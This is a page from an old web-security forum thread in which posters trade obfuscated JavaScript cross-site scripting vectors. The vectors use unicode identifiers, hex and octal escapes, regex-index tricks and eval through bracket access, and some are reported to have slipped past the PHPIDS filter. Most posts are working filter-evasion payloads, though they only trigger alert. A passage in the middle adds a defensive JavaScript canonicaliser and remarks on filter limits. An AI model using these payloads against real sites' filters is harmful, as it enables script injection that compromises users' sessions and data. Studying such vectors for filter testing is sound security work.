Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 5 of 16
Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 20, 2007 04:25AM

Mixing unicode and normal numbers/characters can produce beautiful variables :)

\u5001$=1
\u5000$=\u5001$?alert:\u5001$
\u5000$(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 20, 2007 05:49AM

This was going to be a PHPIDS vector but Mario fixed it before I had a chance to post it, damn you Mario :) So I thought I'd post it here instead.

\u50001=/atob('YWxlcnQoJ01lcnJ5IENocmlzdG1hcyBoYWNrZXJzIScp')/[-1]
\u50002=/eva/[-1]
\u50003=0[\u50002+'l'](\u50001)
0[\u50002+'l'](\u50003)


Re: New XSS vectors
Posted by: Anonymous User
Date: December 20, 2007 08:29AM

Yep - JS Unicode was included after you found the \u0061lert(1) issue and Dan's very cool regex-to-string-by-negative-array-index-method is now covered too ;)

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 20, 2007 08:43AM

Yeah it's top! :D
0['\x65\x76\x61\l'](0['\x65\x76\x61\l'](/'\x61\lert\(\x22\x44\x61\x6E\x27\x73\x20\x71\x75\x6F\x74\x65\x6C\x65\x73\x73\x20\x73\x74\x72\x69\x6E\x67\x20\x74\x65\x63\x68\x6E\x69\x71\x75\x65\x20\x69\x73\x20\x67\x72\x65\x61\x74\x21\x22\)'/[-1]))


Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 20, 2007 09:11AM

more obscured js code:-
$\u5003=1
$\u5001=/\u00/[-$\u5003]
$\u5002=/u61u6cu65u72u74u28u31u29/[-$\u5003]
$\u5002=$\u5002[/replace/[-$\u5003]](/u/g,$\u5001)
0[/eval/[-$\u5003]]($\u5002)




Edited 2 time(s). Last edit at 12/20/2007 09:13AM by Gareth Heyes.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 20, 2007 10:07AM

Here's some double encoded data:-

\u0062\u003d/\u/\u005b\u002d\u0031\u005d
\u007a\u003d/00/\u005b\u002d\u0031\u005d
\u0063\u003d/c/\u005b\u002d\u0031\u005d
\u0065\u003d\u0030\u005b'\x65\x76\141\154'\u005d\u0028'\142\53\172\53\66\61\53\142\53\172\53\66\53\143\53\142\53\172\53\66\65\53\142\53\172\53\67\62\53\142\53\172\53\67\64\53\142\53\172\53\62\70\53\142\53\172\53\63\61\53\142\53\172\53\62\71'\u0029
\u0030\u005b'\145\166\x61\x6C'\u005d\u0028\u0065\u0029

Here are the Hackvertor tags that constructed it:-
<@uni>b=<@/uni>/\u/<@uni>[-1]<@/uni>
<@uni>z=<@/uni>/00/<@uni>[-1]<@/uni>
<@uni>c=<@/uni>/c/<@uni>[-1]<@/uni>
<@uni>e=0[<@/uni>'<@hex>ev<@/hex><@oct>al<@/oct>'<@uni>](<@/uni>'<@oct>b+z+61+b+z+6+c+b+z+65+b+z+72+b+z+74+b+z+28+b+z+31+b+z+29<@/oct>'<@uni>)<@/uni>
<@uni>0[<@/uni>'<@oct>ev<@/oct><@hex>al<@/hex>'<@uni>](e)<@/uni>

Basically the string "alert(1)" is converted to Unicode, then the Unicode string is split up into separate parts, which are then octal encoded. Each other part is then Unicode encoded :)

Oops, almost forgot: the string is eval'd twice, once to decode the Unicode data and a second time to execute the decoded data. The evals are encoded with hex and octal.




Edited 1 time(s). Last edit at 12/20/2007 10:09AM by Gareth Heyes.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 21, 2007 07:28AM

sla.ckers won't display them correctly but converts the characters to entities:-

&#54280;=-1
&#21477;=/e/[&#54280;]+/val/[&#54280;]
&#22924;=/a/[&#54280;]+/lert(1)/[&#54280;]
&#54280;[&#21477;](&#22924;)

&#54280;=-1
&#21477;=RegExp(/e/)[&#54280;]+RegExp(/val/)[&#54280;]
&#22924;=RegExp(/a/)[&#54280;]+RegExp(/lert(1)/)[&#54280;]
&#54280;[&#21477;](&#22924;)


Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 21, 2007 07:38AM

\u5001_=-1
\u5002_=/e/[\u5001_]+/val/[\u5001_]
\u5003_=/a/[\u5001_]+/lert(1)/[\u5001_]
\u5001_[\u5002_](\u5003_)


Re: New XSS vectors
Posted by: DoctorDan
Date: December 22, 2007 08:15PM

Keep that unicode stuff comin'! That last vector is pretty tricky, Gareth.
I had to work a bit for this one...
y='al'
y=(z=y+'ert(1)')&&[][(x='ev')+(y=y)]
y(z)


I kept the strings defined normally (with apostrophes) because the vector is already relatively hard to figure out. Of course, the regex-to-string trick could also be used with it. New trick: []['eval']==eval()


-Dan

Re: New XSS vectors
Posted by: thornmaker
Date: December 22, 2007 10:49PM

This one only works in IE 6 and 7, as far as I know, and uses the conditional compilation feature MS added to JScript. Kinda strange that it can be used in the middle of statements...

{x/*@cc_on=alert@*/}x/*@(/xss/@*/)

@doctordan: []['eval'] is a nice one. For the record though, it doesn't work with firefox 3. In the few minutes I spent testing with FF3, the only variations I've seen that do work are this['eval'] and similar ones with top, window, and so forth.
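
The vectors in Gareth's escape posts above (the \uXXXX identifiers, the hex/octal "eval" strings, the entity-encoded version sla.ckers produced) and thornmaker's conditional-compilation post all defeat a filter that matches on the raw request text. The following is an added example, not code from the thread, from any poster, or from PHPIDS: a small canonicaliser that decodes numeric entities and JS escapes so a signature check sees the same token the engine sees, plus a heuristic flag for the regex-to-string index shape the thread discusses. The SIGNATURES list and the sample inputs are constructed for the demo; the samples are quoted from the posts above. Nothing is executed, it is plain string processing.

```javascript
// Added example, not code from the thread or from PHPIDS: canonicalise the
// escape forms used in the vectors above so a signature-based filter sees the
// same token the JS engine sees. Pure string processing; nothing is executed.

// Numeric HTML entities (&#54280;), the form sla.ckers showed the posts in.
const ENTITY = /&#(\d+);/g;

// JS escapes: \uXXXX (legal in identifiers and strings), \xXX and 1-3 digit
// octal escapes (strings only), and single-letter escapes such as \l.
const ESCAPE = /\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})|\\([a-zA-Z])/g;

function decodeOnce(src) {
  return src.replace(ESCAPE, (m, uni, hex, oct, letter) => {
    if (uni !== undefined) return String.fromCharCode(parseInt(uni, 16));
    if (hex !== undefined) return String.fromCharCode(parseInt(hex, 16));
    if (oct !== undefined) return String.fromCharCode(parseInt(oct, 8));
    // \n \r \t \b \f \v are real control-character escapes: keep them.
    // Any other letter escape (\l, \e ...) is an identity escape in a string.
    return 'nrtbfv'.includes(letter) ? m : letter;
  });
}

// Decode entities, then escapes, repeating a bounded number of times because
// one layer can produce another (\u005cu0061 decodes to \u0061, then to a).
function decodeEscapes(src, maxPasses = 4) {
  let out = src.replace(ENTITY, (_, d) => String.fromCodePoint(Number(d)));
  for (let i = 0; i < maxPasses; i++) {
    const next = decodeOnce(out);
    if (next === out) break;
    out = next;
  }
  return out;
}

// Constructed rule list for the demo; a real filter carries many more.
const SIGNATURES = ['alert', 'eval', '@cc_on'];

// Regex literal indexed with a number, e.g. /eval/[-1]: the regex-to-string
// trick the thread describes. Flag the shape rather than any particular word.
const REGEX_INDEX = /\/[^\/\n]+\/\[-?\d+\]/;

function analyse(src) {
  const canon = decodeEscapes(src);
  const findings = SIGNATURES.filter((s) => canon.includes(s));
  if (REGEX_INDEX.test(canon)) findings.push('regex-literal index');
  return { canon, findings };
}

// Vectors quoted from the thread, as they would arrive in a request
// (constructed sample set).
const SAMPLES = [
  '\\u0061lert(1)',
  "0['\\x65\\x76\\x61\\l'](/'\\x61\\lert\\(1\\)'/[-1])",
  '&#54280;=-1',
  '{x/*@cc_on=alert@*/}x/*@(/xss/@*/)',
];

for (const s of SAMPLES) console.log(JSON.stringify(analyse(s)));
```

Static decoding only recovers one layer: Gareth's "double encoded" vector assembles its \u escapes at run time by string concatenation, so the canonical form still shows only the concatenation expression, not "alert". That is the limit of matching on input, and the reason the sink matters more than the signature: code that passes attacker-influenced strings to eval (or to `0['eval']`, `this['eval']` and the other spellings in this thread) stays exploitable whatever the filter catches.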

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 23, 2007 05:57AM

\u55FF=-1
\u55FD=RegExp(/eval/)[\u55FF]
\u55FC=RegExp(/alert(1)/)[\u55FF]
0[\u55FD](\u55FC)


Re: New XSS vectors
Posted by: Anonymous User
Date: December 23, 2007 07:30AM

@Dan: Nice one indeed. The fact that []['eval'] isn't supported anymore seems to be due to the fact that FF3 supports JS1.9 and hence got a major engine update.

([0]['eval'])([{$:'alert(0)'}.$][0])

Re: New XSS vectors
Posted by: sirdarckcat
Date: December 28, 2007 02:23AM

{var {5:y,2:q,1:z,4:u,3:r,0:w}="velart"}[0][z+w+r+q](r+q+z+u+y)(123)

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: New XSS vectors
Posted by: sirdarckcat
Date: December 28, 2007 03:14AM

This stuff r0x:
http://code.google.com/p/jslibs/wiki/JavascriptTips

Come on:
(x=<script/>).@src=/\/www.x.se/+/xm8?/;
x.toXMLString();

And..
((x=/(<scr).*(ipt>)/).test(x));
alert(RegExp.$1+RegExp.$2);

Oh, and.. forget about setter and getter
x={__noSuchMethod__:eval};
(x.alert(0))(x.location(0));


Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 02, 2008 06:59AM

eval(document.URL.slice(-8));

Payload is assigned to the URL like this:-
index.php/alert(1)


Re: New XSS vectors
Posted by: Anonymous User
Date: January 02, 2008 07:30AM

@sirdarckcat

damn.. that's like pr0n0graphy for us pr0grammers! ^^

Re: New XSS vectors
Posted by: DoctorDan
Date: January 02, 2008 01:39PM

@Gareth
Nice idea!

@sirdarckcat
Those are pretty intense! That is some very nice work. Both of your posts have some interesting stuff going on.

While I'm here, I thought I would post one that got through the PHPIDS:
[$y=('al')]&&[$z=$y]&&[$z+=('ert')+[]][DocDan=(/ev/)[-1]+$y]($z).valueOf()(1)
^Only works in FF2, though^

-Dan

Re: New XSS vectors
Posted by: Anonymous User
Date: January 02, 2008 02:48PM

with emphasis on got ;) very nice one DoctorDan! Here's another haiku though:


the beauty of the hidden
often disappears
when unveiled

(sessionStorage[!-1]=alert)(!-1)




Edited 1 time(s). Last edit at 01/02/2008 02:55PM by .mario.

Re: New XSS vectors
Posted by: tx
Date: January 02, 2008 04:00PM

@.mario:that's beautiful. :)

-tx @ lowtech-labs.org

Re: New XSS vectors
Posted by: DoctorDan
Date: January 02, 2008 08:57PM

@.mario
That is just silly! As tx said- damn, is that a beautiful thing. I don't even fully understand it, haha. Nice work!

-Dan

Re: New XSS vectors
Posted by: Anonymous User
Date: January 13, 2008 02:27PM

This language will drive me crazy somewhen. Gareth and thornmaker - you can have my stuff when I die ;)


asking why
is the key to
learning how

!.0in\u0020alert(1)

Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 13, 2008 02:40PM

@mario

Hehe

x=[/&/,alert,/&/][1],x(1)
new RegExp(/a/,alert(1))
RegExp(/a/,alert(1))
delete alert(1)
typeof alert(1)
instanceof alert(1)
throw alert(1)
delete this[
decodeURI
(
'a%6Cert'
)
]
(1)


Re: New XSS vectors
Posted by: Anonymous User
Date: January 13, 2008 02:43PM

Nice ;)

!alert(2)in!alert(1)

Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 13, 2008 02:54PM

''in alert(1)
/^/in alert(1)
new Date in alert(1)




Edited 2 time(s). Last edit at 01/13/2008 03:01PM by Gareth Heyes.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 13, 2008 06:32PM

alert(1)['*(&£%(*&£^(']


Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 14, 2008 06:09AM

Date [decodeURI('e%76al')] (decodeURI('a%6Cert(1)'))


Re: New XSS vectors
Posted by: Anonymous User
Date: January 15, 2008 03:42PM


['I like'],{g:0in~/*for another*/~alert(!!1)}


:)



Edited 1 time(s). Last edit at 01/15/2008 04:08PM by .mario.

Re: New XSS vectors
Posted by: Anonymous User
Date: January 15, 2008 03:47PM

and:try{1in to}catch(møre){alert(!1)}


What about a 'making real sentences with JS' thread? *g*



Edited 2 time(s). Last edit at 01/15/2008 03:50PM by .mario.

Re: New XSS vectors
Posted by: Anonymous User
Date: January 15, 2008 04:20PM


with(RegExp)an:alert(true,'ly is possible');too:!!!1,('of course')

Re: New XSS vectors
Posted by: sirdarckcat
Date: January 15, 2008 04:38PM

noobs!
http://www.sirdarckcat.net/morfi.html

hehe, sorry..

javascript:is="used";for each(member in "slackers")can:(u=confirm(/it/))?['p'*le453]:"thanks";


Sorry, you can't reply to this topic. It has been closed.